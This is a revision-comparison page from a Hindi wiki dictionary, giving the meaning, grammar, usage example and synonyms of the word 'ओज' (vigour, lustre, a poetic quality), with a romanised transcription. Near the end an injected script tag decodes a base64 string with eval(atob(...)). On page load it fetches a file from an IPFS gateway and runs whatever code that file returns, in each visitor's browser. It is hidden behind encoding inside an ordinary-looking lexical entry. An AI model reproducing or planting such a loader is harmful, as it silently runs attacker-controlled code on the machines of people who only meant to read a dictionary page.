Difference between revisions of "ओज"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
Line 2: Line 2:
 
|हिन्दी=कान्ति, [[तेज]], (काव्यशास्त्र) भाषा या रचना के तीन गुणों में से एक, रचना का वह गुण जो मन में दीप्ती, आवेग, वीरता का भाव उत्पन्न करता है।
 
|हिन्दी=कान्ति, [[तेज]], (काव्यशास्त्र) भाषा या रचना के तीन गुणों में से एक, रचना का वह गुण जो मन में दीप्ती, आवेग, वीरता का भाव उत्पन्न करता है।
 
|व्याकरण=[संस्कृतभाषा ओजस] पुल्लिंग- दीप्ती
 
|व्याकरण=[संस्कृतभाषा ओजस] पुल्लिंग- दीप्ती
|उदाहरण=प्रातःकाल में व्यायाम शरीर में उत्साह और आवेग का भाव उत्पन्न करता है।  
+
|उदाहरण=प्रातःकाल में व्यायाम शरीर में ओज और उत्साह का भाव उत्पन्न करता है।  
 
|विशेष=रचना में ओज गुण के लिए कठोर वर्णों, संयुक्त वर्णों, वर्णो के द्वित्व, रेफ तथा लम्बे समासों का प्रयोग होता है। रसगंगाधर में ओज के पाँच भेद बतलाये गये हैं।  
 
|विशेष=रचना में ओज गुण के लिए कठोर वर्णों, संयुक्त वर्णों, वर्णो के द्वित्व, रेफ तथा लम्बे समासों का प्रयोग होता है। रसगंगाधर में ओज के पाँच भेद बतलाये गये हैं।  
 
|पर्यायवाची=ताप, अवदाह, आतप, इद्ध, उष्णता, उष्णा, उष्मा, ऊष्मानुभूति, औष्ण, गरमाहट, गरमी, तप, तप्ति, तापानुभूति, ताब, ताव, तेज, तेज़ी, दाघ, दाह, विदाह, सोज़, सोज़िश, वीर्य, धात, धातु, नरबीज, नुफ़ता, पौरुष, शारीरिक बल, चेतना, ज़ोर, ताक़त, दम, प्राण, बल, मज़बूती, शक्ति, शरीर शक्ति, आभा, इंदिरा, ईशान, उभास, उल्लास, ओप, कांति, चमक, छटा, जगमगाहट, जगर, मगर, जाज्वल्यता, ज्योति, त्विषा, दमक, दिव्यता, द्युति, द्युम्न, नूर, प्रतिभा, प्रभा, प्रवास, भामा, भासता, मयूख, रौनक़, विलास, शुक्र, शुचि, शुभ्रा, सुप्रभा, सुषमा
 
|पर्यायवाची=ताप, अवदाह, आतप, इद्ध, उष्णता, उष्णा, उष्मा, ऊष्मानुभूति, औष्ण, गरमाहट, गरमी, तप, तप्ति, तापानुभूति, ताब, ताव, तेज, तेज़ी, दाघ, दाह, विदाह, सोज़, सोज़िश, वीर्य, धात, धातु, नरबीज, नुफ़ता, पौरुष, शारीरिक बल, चेतना, ज़ोर, ताक़त, दम, प्राण, बल, मज़बूती, शक्ति, शरीर शक्ति, आभा, इंदिरा, ईशान, उभास, उल्लास, ओप, कांति, चमक, छटा, जगमगाहट, जगर, मगर, जाज्वल्यता, ज्योति, त्विषा, दमक, दिव्यता, द्युति, द्युम्न, नूर, प्रतिभा, प्रभा, प्रवास, भामा, भासता, मयूख, रौनक़, विलास, शुक्र, शुचि, शुभ्रा, सुप्रभा, सुषमा

Revision as of 05:49, 8 July 2010

shabd sandarbh
hindi kanti, tej, (kavyashastr) bhasha ya rachana ke tin gunoan mean se ek, rachana ka vah gun jo man mean dipti, aveg, virata ka bhav utpann karata hai.
-vyakaran    [sanskritabhasha ojas] pulliang- dipti
-udaharan   pratahkal mean vyayam sharir mean oj aur utsah ka bhav utpann karata hai.
-vishesh    rachana mean oj gun ke lie kathor varnoan, sanyukt varnoan, varno ke dvitv, reph tatha lambe samasoan ka prayog hota hai. rasagangadhar mean oj ke paanch bhed batalaye gaye haian.
-vilom   
-paryayavachi    tap, avadah, atap, iddh, ushnata, ushna, ushma, ooshmanubhooti, aushn, garamahat, garami, tap, tapti, tapanubhooti, tab, tav, tej, tezi, dagh, dah, vidah, soz, sozish, viry, dhat, dhatu, narabij, nufata, paurush, sharirik bal, chetana, zor, taqat, dam, pran, bal, mazabooti, shakti, sharir shakti, abha, iandira, eeshan, ubhas, ullas, op, kaanti, chamak, chhata, jagamagahat, jagar, magar, jajvalyata, jyoti, tvisha, damak, divyata, dyuti, dyumn, noor, pratibha, prabha, pravas, bhama, bhasata, mayookh, raunaq, vilas, shukr, shuchi, shubhra, suprabha, sushama
sanskrit napuansak liang [ubjh+asunh balipah, gunashch], sharirik samarthy, bal, shakti, viry, jananatmak, abha, prakash, shaili ka vistrit rup, samas ki bahulata[1]-ojah samasabhootastvametadoogadyasy jivitamh-[2], pani, dhatu ki chamak.
any granth
sanbandhit shabd
sanbandhit lekh

any shabdoan ke arth ke lie dekhean shabd sandarbh kosh
<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

  1. dandi ke anusar yahi gady ki atma hai.
  2. kavyadarsh 1/80